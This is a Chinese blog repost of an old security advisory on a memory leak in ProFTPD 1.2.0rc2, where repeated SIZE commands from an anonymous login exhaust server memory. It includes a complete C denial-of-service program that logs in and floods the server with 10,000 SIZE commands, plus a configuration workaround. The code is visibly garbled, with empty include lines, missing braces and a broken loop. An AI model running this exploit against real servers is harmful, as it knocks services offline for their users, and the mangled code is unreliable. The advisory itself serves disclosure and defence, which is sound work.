Proftpd 记忆体泄漏拒绝服务攻击漏洞

最新推荐文章于 2024-05-06 20:26:04 发布
最新推荐文章于 2024-05-06 20:26:04 发布
阅读量607 收藏
点赞数
分类专栏: eBook.Linux 文章标签: socket null stream tcp 测试 user
描述: 
-------------------------------------------------------------------------------- 


Proftpd是一个流行的Ftp服务软体。它在执行SIZE命令时存在一个记忆体泄漏的 
问题,攻击者可以利用此问题进行拒绝服务攻击。 

如果执行5000条SIZE命令,将导致系统用300KB记忆体。如果执行大量的SIZE 
命令,将使记忆体耗尽,导致拒绝服务攻击。攻击者只需要匿名访问权限即可 
进行这种攻击。 

<*来源:Wojciech Purczynski (wp@elzabsoft.pl) 
Piotr Zurawski [fb] (szur@ix.renet.pl) 
*> 



测试程序: 
-------------------------------------------------------------------------------- 

警 告 

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! 



/* Proftpd DoS 
* by Piotr Zurawski (szur@ix.renet.pl) 
* This source is just an example of memory leakage in proftpd-1.2.0(rc2) 
* server discovered by Wojciech Purczynski. 
*/ 

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define USERNAME "anonymous" 
#define PASSWORD "dupa@dupa.pl" 
#define HOWMANY 10000 

void logintoftp(); 
void sendsizes(); 
int fd; 
struct in_addr host; 
unsigned short port = 21; 
int tcp_connect(struct in_addr addr,unsigned short port); 

int main(int argc, char **argv) 


if (!resolve(argv[1],&host)) 

fprintf(stderr,"Hostname lookup failure/
"); 
exit(0); 


fd=tcp_connect(host,port); 


logintoftp(fd); 

printf("Logged/
"); 

sendsizes(fd); 

printf("Now check out memory usage of proftpd daemon"); 
printf("Resident set size (RSS) and virtual memory size (VSIZE)"); 
printf("fields in ps output"); 


void logintoftp() 


char snd[1024], rcv[1024]; 
int n; 

printf("Logging " USERNAME "/" PASSWORD "/r/
"); 

memset(snd, '/0', 1024); 
sprintf(snd, "USER %s/r/
", USERNAME); 
write(fd, snd, strlen(snd)); 

while((n=read(fd, rcv, sizeof(rcv))) > 0) 

rcv[n] = 0; 
if(strchr(rcv, '/
') != NULL)break; 


memset(snd, '/0', 1024); 
sprintf(snd, "PASS %s/r/
", PASSWORD); 
write(fd, snd, strlen(snd)); 

while((n=read(fd, rcv, sizeof(rcv))) > 0) 

rcv[n] = 0; 
if(strchr(rcv, '/
') != NULL) 
break; 

return; 


void sendsizes() 

char snd[1024], rcv[1024]; 
unsigned long loop; 

printf ("Sending %i size commands... /
", HOWMANY); 

for(loop=0;loop { 
sprintf(snd, "SIZE /dadasjasojdasj/adhjaodhahasohasaoihroaha"); 
write(fd, snd, strlen(snd)); 


return; 


int tcp_connect(struct in_addr addr,unsigned short port) 

int fd; 

struct sockaddr_in serv; 
bzero(&serv,sizeof(serv)); serv.sin_addr=addr; 
serv.sin_port=htons(port); 
serv.sin_family=AF_INET; 

if ((fd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)) < 0)/ 

perror("socket"); 
exit(0); 


if (connect(fd,(struct sockaddr *)&serv,sizeof(serv)) < 0) 

perror("connect"); 
exit(0); 


return(fd); 


int resolve(char *hostname,struct in_addr *addr) 

struct hostent *res; 
res=gethostbyname(hostname); 
if (res==NULL) 
return(0); 
memcpy((char *)addr,res->h_addr,res->h_length); 
return(1); 



-------------------------------------------------------------------------------- 
建议: 

临时解决方法: 

Dmitry Alyabyev 提供了一个临时解决 
方法,限制SIZE命令的使用,在配置文件中增加下列语句: 


Deny All 
 
Chendy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux关闭proftpd服务,Linux ProFTPd安装与卸载详细介绍
weixin_29133151的博客
05-04 324
Linux系统上ProFTPd安装与卸载的详细过程yum install proftpdvi /etc/proftpd.conf  ← 修改ProFTPD的配置文件ServerType        standalone   ← 找到这一行,在行首添加“#”↓#ServerType        standalone   ← 变为此状态,不使用常驻模式#ServerType       inetd...
CentOS 7下安装配置proftpd搭建ftp服务器的详细教程
09-30
主要介绍了CentOS 7下安装配置proftpd搭建ftp服务器的详细教程,需要的朋友可以参考下
ProFTPD STAT命令远程拒绝服务攻击漏洞
Chendy的专栏
04-11 712
发布日期:2002-12-09更新日期:2002-12-16受影响系统: ProFTPD Project ProFTPD 1.2.7 rc3ProFTPD Project ProFTPD 1.2.7 rc2ProFTPD Project ProFTPD 1.2.7 rc1ProFTPD
FTP服务proFTPD1.3.3C漏洞利用
qq_62272017的博客
06-22 453
FTP服务漏洞利用
ProFTPD服务
Liang_GaRy的博客
01-28 2119
ProFTPD服务 简介 ProFTPD服务是一个安全、配置简单的ftp服务器软件; 采用的是Apache相似的配置格式,相对比较容易配置与管理; 安装ProFTPD 浏览官网:ftp://ftp.proftpd.org/distrib/source 找到.tar.gz的文件下载下来 准备好源码安装ProFTPD服务 下载源码包中含有安装说明,INSTALL和README这两个文件当中 #解压包 [root@localhost ~]# cd /usr/local/src/ [root@localhost s
myftpadmin+proftpd+mysql架设ftp服务器_配置proftpd-admin管理proftpd服务器
weixin_29338423的博客
02-07 214
系统:CentOS 5.7 64bit原有环境:LNMP.org v0.7proftpd版本:1.3.4aweb管理:proftpd-admin 1.2一. ProFTPd 的安装1. 下载proftpd源码包并解压:http://proftpd.org/tar zxf proftpd-1.3.4a.tar.gzcd proftpd-1.3.4a2. 添加proftpd将使用的目录、用户和组mkd...
Proftpd服务搭建
weixin_38367535的博客
02-15 954
前几天迁移服务器,其中有个ftp,当时以为这个ftp只是公司用来上传视频的,所以搭建了一个vsftpd服务,没想到这个ftp同时还被java程序连接,而java使用vsftpd进行文件移动时总会报错‘550 Rename failed’,其实就是移动时会先更改源文件名称,而改名时名称前面会加上路径,其中‘/’是不允许在命名时使用的,所以最后只能还使用原来的proftpd服务。 1、环境 阿里云ECS CentOS7 2、下载文件 wget ftp://ftp.proftpd.org/distrib
ProFTPD远程命令执行漏洞或影响100多万台服务器
NOSEC2019的博客
07-23 1229
ProFTPD是一个开源,跨平台的FTP服务软件,支持大多数类Unix系统和Windows,是Unix平台下最流行的FTP服务软件之一,且同时支持Pure-FTPD和vsftpd。 而最近,ProFTPD被曝出任意文件复制漏洞,可导致超过一百万多台安装了ProFTPD的服务器受到远程命令执行和信息泄漏攻击。 所有版本在1.3.5b及其以下的ProFTPD软件都会受到该漏洞影响,攻击者只要成功利用...
4.10、漏洞利用-Proftpd、Mysql、Postgresql
c10udz的博客
11-23 800
proftpd的全称是Professional FTP daemon,类unix和unix平台FTP服务器程序,默认使用2121号端口,与vsftpd类似开源。 MySQL是关系型数据库管理系统,默认使用3306端口。关系数据库将数据保存在不同的表中;非关系型数据库,把数据存储到大的内存当中,而不是存储到大的表当中。postgresql(pg)是开源关系型数据库,最开始叫postgres,默认使用5432端口。
funbox11靶机(ProFTPD1.3.3c提权漏洞
m0_66299232的博客
11-13 462
3.上面俩个利用点都失败 ,前面探测到21端口proftpd有版本号。3.按照格式输出命令,成功进去root,轻松拿下!攻击机系统:kali linux 2021.1。1.用smbmap登录smb服务,查找利用信息。1.自己谷歌下版本漏洞可以找到利用的脚本。4.保存到当前目录,查看下,没啥大用。2.执行后发现usage,给出执行格式。2.用wpscan暴力破解用户名密码。2.用gobuster进行目录扫描。1.探测目标靶机开放端口和服务。虚拟机网络链接模式:桥接模式。ProFTPD1.3.3c提权漏洞
cpx_proftpd:漏洞利用工具 CVE-2015-3306
06-11
cpx_proftpd Daniel Aldana 针对漏洞利用的 PoC。 Vadim Melihow 报告的错误。 ###方法1: 用法: python cpx_proftp.py <IP> <REMOTE> 前任: python cpx_proftp.py 127.0.0.1 /etc/passwd /var/...
linux下用Proftpd搭建ftp服务器及配置方法
09-30
很久以前知道linux下搭建ftp服务器的软件是wuftp,现在真的时代变了,上网看一下几乎全世界的人都用proftpd了!赶个潮流,我也用proftpd在公司的一台备用小服务器上装上ftp服务器
16:00面试,16:06就出来了,问的问题有点变态。。。
qq_48811377的博客
04-30 6974
整份文档一共有将近 200 页,全部为大家展示出来肯定是不太现实的,为了不影响大家的阅读体验就只展示了部分内容,还望大家海涵,希望能帮助到您面试前的复习且找到一个好的工作,也节省大家在网上搜索资料的时间来学习!
【课堂练习】
JacksonLeo的博客
04-29 526
虽然现代JVM的垃圾回收机制已经非常高效,但是在性能敏感的场合,仍然需要注意对象的创建频率。例如,在SysLogininforMapper中的deleteLogininforByIds方法,如果处理大量ID时,应考虑使用批处理技术,而不是循环单条处理。例如,在SysMenuMapper中的查询方法,如果涉及到复杂的查询条件或者大量数据的查询,应确保SQL语句的优化和索引的使用。异常处理:代码中应该有更明确的异常处理逻辑,比如使用try-catch块捕获可能的异常,并进行适当的处理,如记录日志、回滚事务等。
第16章 基于结构的测试技术(白盒测试技术)
weixin_43499846的博客
05-04 947
不需要执行程序在编译和动态测试之前快速找出软件的一些缺陷的本质(黑盒是表面)能发现30%~70%左右的逻辑设计和编码的缺陷给变量赋值的过程;从变量定义到使用的控制流子路径要求覆盖变量所有定义,要覆盖从定义到其谓词使用或计算使用的至少一个子路径从每个变量定义到该定义的每次使用(包括谓词使用和计算使用)的所有控制流子路径要求覆盖到从每个变量定义到它的每次使用的所有无环子路径(从定义到使用的过程中,对这个变量不再做第二次定义)全使用测试和全定义–使用路径测试的区别。
使用groovy+spock优雅的进行单测
ttyy1112的专栏
04-30 944
Groovy是一种基于JVM的动态语言,它可以与Java代码无缝集成。Spock是一个基于Groovy的测试框架,专注于简洁性和可读性。它提供了丰富的测试DSL(领域特定语言),支持行为驱动开发(BDD)风格的测试。使用Groovy和Spock进行单元测试时,你可以利用Spock的特性编写清晰、易读的测试用例。通过givenwhenthen和where块,你可以清晰地描述测试的前提条件、操作和预期结果。同时,Spock还提供了@Unroll。
网络安全(黑客)—-2024自学手册
最新发布
xv7676的博客
05-06 547
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
华为od入职第13天!
xiaofanren1111的博客
04-29 162
今天早上就分配活了,写一个模块的ut,但是今天一句代码没写成,一直在看代码逻辑。晚上我导师给我们几个新员工讲项目框架和一些代码逻辑啥的,讲了一个多小时,然后讲完后拉我单独又聊了一下,他跟我讲怎么写单元测试,然后diss了一下之前那些写单元测试的,说那些代码写得和💩一样,为了覆盖率而写的,然后让我去写的话怎么去写,然后还说让我尽量把那些写得像屎一样的重新写一下。我只是个新来的小od,我连那种💩一样的都写不出来😂。跟我聊了一个多小时,莫名就到晚上9.00了,我同事一直在催我走,然后就去拿了个夜宵走人了。
proftpd 漏洞详情 是否存在vsftpd漏洞
06-08
ProFTPD 曾经存在多个安全漏洞,包括远程执行代码漏洞(CVE-2019-12815)、拒绝服务漏洞(CVE-2015-3306)、授权访问漏洞(CVE-2014-3529)等。这些漏洞可能导致攻击者远程执行任意代码、拒绝服务攻击授权访问...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值